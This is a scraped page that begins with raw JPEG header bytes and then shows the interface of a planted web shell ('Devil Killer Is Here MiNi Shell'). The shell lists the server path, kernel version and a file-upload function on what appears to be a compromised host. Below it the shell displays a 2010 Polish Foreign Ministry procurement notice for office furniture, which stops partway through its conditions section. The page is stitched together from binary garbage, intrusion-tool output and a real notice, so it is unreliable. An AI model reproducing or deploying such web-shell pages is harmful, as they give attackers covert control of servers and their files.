JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/222480-N-2010.html

<p class="kh_header"><b>Warszawa: POSTĘPOWANIE O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO PROWADZONEGO W TRYBIE PRZETARGU NIEOGRANICZONEGO DO 125 000 EURO NA ZAKUP WRAZ Z DOSTAWĄ MEBLI BIUROWYCH DLA POTRZEB MSZ</b><br>
<b>Numer ogłoszenia: 222480 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> POSTĘPOWANIE O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO PROWADZONEGO W TRYBIE PRZETARGU NIEOGRANICZONEGO DO 125 000 EURO NA ZAKUP WRAZ Z DOSTAWĄ MEBLI BIUROWYCH DLA POTRZEB MSZ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OZNACZENIE POSTĘPOWANIA: ZO/7530/35A/2010
Przedmiotem zamówienia jest: 
Zakup wraz z dostawą mebli biurowych dla potrzeb MSZ.



Lp.	Nazwa mebla oraz podstawowy opis wyglądu	Zamawiana ilość w szt.
1.	Biurko gabinetowe o wymiarach 180x100x74 cm (WxDxH)blat o grubości nie mniej niż 37mm, całe biurko pokryte okleiną naturalną.

                         
	

2.Przystawka gabinetowa o wymiarach do biurka o wymiarach 1187x636x690mm (WxDxH), blat o grubości nie mniej niż 37mm,cała przystawka pokryta okleiną naturalną.

                                
	4
3Ława gabinetowa o wymiarach 1100x700x550 mm
(WxDxH), blat o grubości 37mm,cała  ława pokryta okleiną naturalną.
                          	4
4.Stół gabinetowy o wymiarach 160x100x75 cm (WxDxH), grubość blatu nie mniej niż 37mm, cały stół pokryty okleiną naturalną.	4
5.Kontener gabinetowy na kółkach z trzema szufladami (prowadnice łożyskowe), zamykanymi na centralny zamek blokujący wszystkie szuflady o wymiarach 436x640x600 (WxDxH), wieniec górny pokryty okleiną naturalną.	     4
6.Szafka pomocnik gabinetowa z pełnymi drzwiami, z cokołem, o wymiarach 1200x452x662 (WxDxH), wieniec górny pokryty okleiną naturalną, wieniec górny(blat)szafki grubość nie mniej niż 37mm.	4
7.Szafka gabinetowa z drzwiami oszklonymi (szkło mrożone) z cokołem, z dwoma półkami o wymiarach 900x470x1348 (WxDxH), wieniec górny pokryty okleiną naturalną, wieniec górny (blat) szafki grubość nie mniej niż 37mm.	4
8.Szafka gabinetowa z drzwiami pełnymi z cokołem, dwoma półkami o wymiarach 900x470x1348 (WxDxH), wieniec górny pokryty okleiną naturalną, wieniec górny (blat) szafki grubość nie mniej niż 37mm.	4
9.Szafa gabinetowa ubraniowa jednodrzwiowa z półką, z cokołem, o wymiarach 180x40x60 (wys x szer x głeb.), wieniec górny pokryty okleiną naturalna, wieniec górny (blat) szafki grubość nie mniej niż 37mm.	4
10Fotel finka, stelaż drewniany, siedlisko i oparcie pokryte skórą naturalną w kolorze czarnym. 	10
11Fotel gabinetowy wyposażony w system ruchowy EPRON SYNCHRO zapewniający optymalny komfort siedzenia. Ruchome siedzisko odchylające się synchronicznie z oparciem. Oparcie wyposażone w zintegrowany zagłówek. Blokada oparcia w wybranej pozycji. Regulowana siła oporu oparcia. Zabezpieczenia przed uderzeniem oparcia w plecy (funkcja anti-shock). Płynnie regulowana wysokość siedziska. Amortyzacja siedziska. Szerokie, wygodne siedzisko i ergonomiczne oparcie. Tapicerka ze skóry naturalnej w kolorze czarnym. Regulowane podłokietniki z miękkimi poliuretanowymi nakładkami. Stabilna, pięcioramienna podstawa jezdna z polerowanego aluminium. Samohamowne kółka do powierzchni dywanowych lub parkietów. Fotel objęty 3 letnią gwarancją, podnośniki 5 lat gwarancji, ewentualne naprawy dokonywane są przez serwisanta pod wskazanym adresem. Wysokość oparcia nie mniej niż 60cm.
FOTEL INVITUS R17M lub równoważny.	20
12Biurko o wymiarach 120 x 60 x 75 cm (szer. x głęb. x wys.), blat wykonany w płyty grubości min.25 mm, nogi i pozostałe elementy wykonane z płyty o grubości min. 18mm, otwory pod przelotki w blacie nawiercić w trakcie montażu w miejscu wskazanym przez Zamawiającego, elementy pionowe biurka zwieńczone blendą spajającą z płyty o szerokości około 50 cm,  z kontenerem pełnej wysokości z 3 szufladami, szuflady na prowadnicach kulkowych metalowych z pełnym wysuwem zabezpieczone przed wypadnięciem, uchwyty szuflad dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, spody szuflad z płyty pilśniowej twardej o grubości min. 6mm lub płyty HDF o grubości 3 mm jednostronnie lakierowanej wewnątrz, szuflady zamykane na zamek centralny. Kontener z prawej strony. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, pokryte melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV  o grubości 2mm w kolorze płyty	60
13Biurko o wymiarach 150x75 x 75 cm (szer. x głęb. x wys.), blat wykonany w płyty grubości min.25 mm, nogi i pozostałe elementy wykonane z płyty o grubości min. 18mm, otwory pod przelotki w blacie nawiercić w trakcie montażu w miejscu wskazanym przez Zamawiającego, elementy pionowe biurka zwieńczone blendą spajającą z płyty o szerokości około 50 cm,  2 kontenery pełnej wysokości po 3 szuflady, szuflady na prowadnicach kulkowych metalowych z pełnym wysuwem zabezpieczone przed wypadnięciem, uchwyty szuflad dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, spody szuflad z płyty pilśniowej twardej o grubości min. 6mm lub płyty HDF o grubości 3 mm jednostronnie lakierowanej wewnątrz - kolor do uzgodnienia, szuflady zamykane na zamek centralny. Kontener z prawej i lewej  strony. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	60
14Szafa aktowa dwudrzwiowa z czterema półkami regulowanej wysokości, mieszcząca 5 rzędów segregatorów, drzwi z zamkiem cylindrycznym i czterema półkami o wymiarach 80 x 40 x 180 cm, drzwiczki pełne (szer. x głęb. x wys.),drzwi szaf z zawiasem puszkowym z samodomykiem pozwalające na otwieranie ich o 110o, drzwi wpuszczane pomiędzy wieńce i nakładane na ściany boczne, uchwyty szafy dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, wieniec dolny i górny o grubości min 25mm pozostałe elementy o grubości 18 mm, wpuszczone plecy szaf  z płyty pilśniowej twardej o grubości min.6 mm wewnętrznie lakierowanej - kolor do uzgodnienia, cokół do montażu, wykonany z płyty wiórowej, montowany na kołki drewniane, wysokość cokołu 7 cm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu ,odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	60
15Przystawka do biurka blat wykonany w płyty grubości min.25 mm, nogi i pozostałe elementy wykonane z płyty o grubości min. 18mm, o wymiarach 100 x 50 x 75 cm (dł. x szer. x wys.). Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	40
16Szafa ubraniowa jednodrzwiowa z półką o wymiarach 180 x 40 x 60 cm (wys. x szer. x głęb.), drzwiczki pełne, wpuszczone plecy szafy  z płyty pilśniowej twardej o grubości min.6 mm wewnętrznie lakierowanej - kolor do uzgodnienia, drzwi szaf z zawiasem puszkowym z samodomykiem pozwalające na otwieranie ich o 110o, drzwi wpuszczane pomiędzy wieńce i nakładane na ściany boczne, uchwyty szuflad dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, wieniec dolny i górny o grubości min 25mm pozostałe elementy o grubości 18 mm, cokół do montażu, wykonany z płyty wiórowej, montowany na kołki drewniane, wysokość cokołu 7 cm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	40
17Krzesło obrotowe tapicerowane z wysokim oparciem (500-650 mm), ergonomiczne z wyprofilowaniem w części lędźwiowej. Regulacja wysokości oparcia, kąta odchylenia oparcia oraz głębokości siedziska za pomocą mechanizmu CPT. Miękkie podłokietniki, stabilna i estetyczna podstawa z samohamownymi kółkami do powierzchni dywanowych, chromowany, zabezpieczenie przed uderzeniem oparcia w plecy po zwolnieniu blokady mechanizmu. Krzesło objęte dwuletnią gwarancją, podnośnik 4 lata gwarancji z ewentualną naprawą serwisanta pod wskazanym adresem. 	150
18Krzesła drewniane tapicerowane z wysokim oparciem. Stelaż krzesła wykonany z drewna liściastego, środkowa część w oparciu tapicerowana, kolor drewna i tapicerki do uzgodnienia, wysokość całkowita 99,5 cm, głębokość 51 cm, szerokość 43,5cm, wysokość do siedzenia 48 cm
Model krzesła A -0409 z fabryki RADOMSKO lub równoważne
 	30
19Stolik do biurka o wymiarach 60x80x75 cm (szer.x dł. x wys.), grubość blatu min. 25 mm, na drewnianych nogach, meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu ,odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	15
20Stolik okrągły o wymiarach f60x65 cm (średnica x wys.), grubość blatu min. 25 mm, podstawa na krzyżowych nogach, meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu ,odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	20
21Stolik kwadratowy o wymiarach 60x60x65 cm (średnica x wys.), grubość blatu min. 25 mm, podstawa na krzyżowych nogach, meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	30
22Stół konferencyjny o wymiarach 180 x 60 x 75 cm (dł. x szer. x wys.), na czterech metalowych chromowanych nogach z możliwością regulacji wysokości, grubość blatu min. 25 mm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	15
23Szafka o wymiarach 80 x 40 x 100 cm, (szer. x głęb. x wys.), drzwiczki oszklone, z 5 półkami, z zamkiem cylindrycznym, drzwi szaf z zawiasem puszkowym z samodomykiem pozwalające na otwieranie ich o 110o, drzwi wpuszczane pomiędzy wieńce i nakładane na ściany boczne, uchwyty szafy dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, wieniec dolny i górny o grubości min 25mm pozostałe elementy o grubości 18 mm, wpuszczone plecy szaf  z płyty pilśniowej twardej o grubości min.6 mm wewnętrznie lakierowanej - kolor do uzgodnienia, cokół do montażu, wykonany z płyty wiórowej, montowany na kołki drewniane, wysokość cokołu 7 cm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	25
24Szafka regał o wymiarach 80 x 40 x 100 cm (szer. x głęb. x wys.), z 2 półkami, wpuszczone plecy szafy  z płyty pilśniowej twardej o grubości min.6 mm wewnętrznie lakierowanej - kolor do uzgodnienia, pełne drzwi szaf z zawiasem puszkowym z samodomykiem pozwalające na otwieranie ich o 110o, drzwi wpuszczane pomiędzy wieńce i nakładane na ściany boczne, uchwyty szuflad dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, wieniec dolny i górny o grubości min 25mm pozostałe elementy o grubości 18 mm, cokół do montażu, wykonany z płyty wiórowej, montowany na kołki drewniane, wysokość cokołu 7 cm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli
	20
25Szafka  o wymiarach 80 x 40 x 80 cm (szer. x głęb. x wys.), z 1 półką, wpuszczone plecy szafy  z płyty pilśniowej twardej o grubości min.6 mm wewnętrznie lakierowanej - kolor do uzgodnienia, pełne drzwi szaf z zawiasem puszkowym z samodomykiem pozwalające na otwieranie ich o 110o, drzwi wpuszczane pomiędzy wieńce i nakładane na ściany boczne, uchwyty szuflad dwupunktowe o rozstawie 125-128 mm kolor i wzór do ustalenia, wieniec dolny i górny o grubości min 25mm pozostałe elementy o grubości 18 mm, cokół do montażu, wykonany z płyty wiórowej, montowany na kołki drewniane, wysokość cokołu 7 cm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	20
26Stolik komputerowy na kółkach z blokadą, wym.90 x 50 x 75 cm (szer. x głęb. x wys.), z ruchomą półką na klawiaturę o wym. min. 50x30 cm (szer. x głęb.) i montowaną na stałe półką na monitor o wym. min. 36 x 36 cm z możliwością montowania z lewej lub prawej strony stolika. Konstrukcja stolika na stelażu 15metalowym z możliwością ustawienia jednostki centralnej pionowo w dolnej części, grubość blatu stolika komputerowego oraz półki pod monitor 
min. 25 mm. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu ,odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	15
27Krzesło ISO lub równoważne ze stelażem metalowym niklowanym , obicie skóra ekologiczna, kolor do uzgodnienia.	12
28.Fotel biurowy tapicerowany z możliwością regulacji wysokości siedziska za pomocą podnośnika pneumatycznego oraz mechanizm ruchowy, który zapewnia swobodne bujanie się w fotelu oraz blokadę w jednej pozycji. Siedzisko wraz z oparciem tworzy całość i jest wyprofilowane w części lędźwiowej. Wysokość oparcia nie mniej niż 65 cm, zabezpieczenie przed uderzeniem oparcia w plecy po zwolnieniu blokady mechanizmu. Stabilna i estetyczna podstawa z samohamownymi kółkami do powierzchni dywanowych. Fotel objęty 2 letnią gwarancją, podnośnik 4 lata gwarancji, ewentualne naprawy dokonywane są przez serwisanta pod wskazanym adresem. 	30
29.Fotel finka, stelaż drewniany, siedlisko i oparcie tapicerowane, kolor tapicerki do uzgodnienia.	10
30.Wieszak stojący wys. 175-190 cm wykonany z rur metalowych, lakierowanych lub chromowanych z koroną na sześć uchwytów oraz pierścieniem i plastikową podstawką pod parasole	20
31.Stół konferencyjny owalny o wymiarach 200x100x75 cm (dł. X szer. X wys.) na metalowych nogach, blat grubości nie mniej niż 3 cm. Na środku blatu wycięcie na przewody. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	3
32.Stolik okrągły o wymiarach f100x75 cm (średnica x wys.), grubość blatu min. 25 mm, podstawa na krzyżowych nogach. Meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli	10
33Kontener na kółkach z 3 szufladami zamykanymi na centralny zamek blokujący wszystkie szuflady, korpus z płyty o grubości min 25 mm, meble wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2, melaminą w kolorze blatu, odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie, meble zabezpieczone na krawędziach blatów listwą PCV   o grubości 2mm w kolorze mebli, szuflady z płyty o grubości min 18mm, uchwyty szuflad dwupunktowe o rozstawie 125-128mm kolor i wzór do ustalenia,, o wymiarach 45x45x50 cm (szer. x gł. x wys.) spody szuflad z płyty pilśniowej twardej o grubości min. 6mm lub płyty HDF o grubości 3 mm jednostronnie lakierowanej wewnątrz - kolor do uzgodnienia, szuflady na prowadnicach kulkowych metalowych z pełnym wysuwem zabezpieczone przed wypadnięciem, wyposażony w zestaw kółek jezdnych przeznaczonych do twardych powierzchni	30
34.Krzesło, szerokość krzesła  47 cm, głębokość 54 cm,
  wysokość 87 cm, struktura - chromowana stal E 101 siedzisko i oparcie wykonane ze skóry w kolorze  czarnym  E 04 Krzesło LOLA firmy Ellero lub równoważne

  
   
      	2

Opis parametrów mebli objętych przedmiotem zamówienia:
1. Meble muszą być wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700 kg/m 2,  pokryte melaminą   (melamina nie dotyczy poz. 1-9), odporne na działanie promieni słonecznych i odbarwienia spełniające ww. normy europejskie,  meble zabezpieczone na krawędziach blatów listwą PCV o grubości  2 mm w kolorze mebli (nie dotyczy pozycji: 1-9);
2. Tył mebli, czyli tzw. plecy muszą być wykonane z płyty pilśniowej twardej o minimalnej grubości 6 mm lub płyty HDF o grubości 3mm;
3. Szuflady muszą być zamontowane na prowadnicach łożyskowych, tj: 
     - zapewniające cichą pracę oraz obciążenie do 25kg/ 1szufladę;
     - centralny zamek (marki YALE, SISO), blokujący jednocześnie wszystkie  szuflady; 
     - wkłady wykonane z tworzywa wysoko udarowego.
4. Cokoły muszą być wykonane z płyty wiórowej trójwarstwowej o gęstości min. 700kg/m3, o wysokości   co  najmniej 7 cm, stanowiące oddzielny element mebla, mocowane za pomocą kołków;
5. Kolor mebli i tapicerki - do uzgodnienia z Zamawiającym (preferowany: calvados, grusza lub jasny dąb). Tapicerka - oban lub mikroluks. Pozycja 1-9 kolor do uzgodnienia.
    
Normy europejskie, które muszą spełniać meble biurowe:
1. szafy i kontenery:
    PN-EN 14073-2 Meble biurowe
    meble do przechowywania
2. biurka i stoły:
    PN-EN 527-1 meble biurowe
    stoły robocze i biurka
    PN-EN 527-2 meble biurowe
    stoły robocze i biurka
3. pracownicze fotele obrotowe:
    PN-EN 1335-1 Meble biurowe.
    krzesło biurowe do pracy
    PN-EN 1335-2 Meble biurowe.
    krzesło biurowe do pracy
4. krzesła gościnne:
    PN-EN 13761 Meble biurowe.
    krzesła dla gości.

Wyżej wymienione normy odnoszą się zarówno do jakości produktów, jak i bezpieczeństwa ich użytkowania. 

UWAGA!
W przypadku dostawy mebli złożonych Wykonawca zobowiązany będzie do ich montażu w wyznaczonym i uzgodnionym terminie z Zamawiającym.
Zamawiający dopuszcza oferowanie mebli o wyższym standardzie niż przedstawione w formularzu ofertowym.

Zamawiający zgodnie z art. 29 i 30 ustawy Prawo zamówień publicznych dopuszcza składanie ofert na meble o parametrach równoważnych i wyższych niż przedstawione niniejszej specyfikacji. 

Na meble objęte przedmiotem zamówienia Wykonawca, po podpisaniu umowy, zobowiązany będzie na żądanie Zamawiającego do przedstawienia   certyfikatu na dopuszczenie do użytku, na palność tkanin tapicerskich oraz certyfikatu na klasę higieniczności płyt wiórowych.

Wybrany Wykonawca zobowiązany jest do udzielenia 24 miesięcznej gwarancji na wszystkie meble objęte przedmiotem zamówienia, z wyłączeniem pozycji nr 17 i 28, na które Wykonawca zobowiązuje się udzielić 48 miesięcy gwarancji oraz pozycji nr 11, na który Wykonawca zobowiązuje się udzielić 36 miesięcy gwarancji.

Wykonawca zobowiązany będzie dostarczyć meble biurowe do siedziby Zamawiającego przy Al. Szucha 23 w Warszawie oraz do Magazynu Centralnego MSZ ul. Taneczna 73 w Warszawie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.21.00-7, 39.12.10.00-6, 39.10.00.00-3, 39.11.30.00-7, 39.13.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia wadium w kwocie 6 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie sprecyzował tego warunku. Zamawiajacy dokona oceny spełnienia przez Wykonawców warunku udziału w postepowaniu na podstawie załączonych do ofert dokumentów i oświadczeń wymaganych w pkt. 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy wykażą się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełniania powyższego warunku, tj.  w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie zrealizowali, a w przypadku świadczeń okresowych lub ciągłych, również realizują, co najmniej 2 dostawy polegające na dostawie  mebli biurowych o  wartości co najmniej 250 000,00 zł brutto każda.

Zamawiajacy dokona oceny spełnienia przez Wykonawców warunku udziału w postepowaniu na podstawie załączonych do ofert dokumentów i oświadczeń wymaganych w pkt. 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA, NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
